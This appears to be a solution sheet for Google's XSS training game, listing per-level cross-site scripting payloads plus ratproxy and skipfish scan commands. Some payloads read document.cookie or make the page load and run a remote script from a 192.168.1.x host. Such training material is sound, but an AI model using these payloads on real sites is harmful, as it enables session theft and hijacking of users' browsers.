Level 1: Hello, world of XSS
https://xss-game.appspot.com/level1/frame
query=<script>alert('xss')</script>
Level 2: Persistence is key
https://xss-game.appspot.com/level2/frame
post-content=<img src='foo' onerror='alert("xss")'>
post-content=<img src='foo' onerror='alert(document.cookie)'>
post-content=<img src='foo' onerror='s=document.createElement("script");s.src="//192.168.1.200/xss.js";document.body.appendChild(s)'>
Level 3: That sinking feeling...
https://xss-game.appspot.com/level3/frame#1
URL=https://xss-game.appspot.com/level3/frame#1' onerror='alert("xss")'>
Level 4: Context matters
https://xss-game.appspot.com/level4/frame
timer=');alert('xss
Level 5: Breaking protocol
https://xss-game.appspot.com/level5/frame
URL=https://xss-game.appspot.com/level5/frame/signup?next=javascript:alert('xss')
Level 6: Follow the X
https://xss-game.appspot.com/level6/frame#/static/gadget.js
URL=https://xss-game.appspot.com/level6/frame#data:text/plain,alert('xss')
URL=https://xss-game.appspot.com/level6/frame#Https://192.168.1.1/xss.js
URL=https://xss-game.appspot.com/level6/frame#//192.168.1.1/xss.js
Tools
#ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -lextifscgjm
#ratproxy -w proxy.log -v traces_dir -p 8080 -d xss-game.appspot.com -XC
# skipfish -b i -I xss-game.appspot.com -X /css/,/img/ -Z -o report_dir -M -E -U https://xss-game.appspot.com
References
http://tools.ietf.org/html/draft-hoehrmann-javascript-scheme-00
https://www.google.com/about/appsecurity/learning/xss/index.html
https://code.google.com/p/ratproxy/wiki/RatproxyDoc
https://code.google.com/p/skipfish/wiki/SkipfishDoc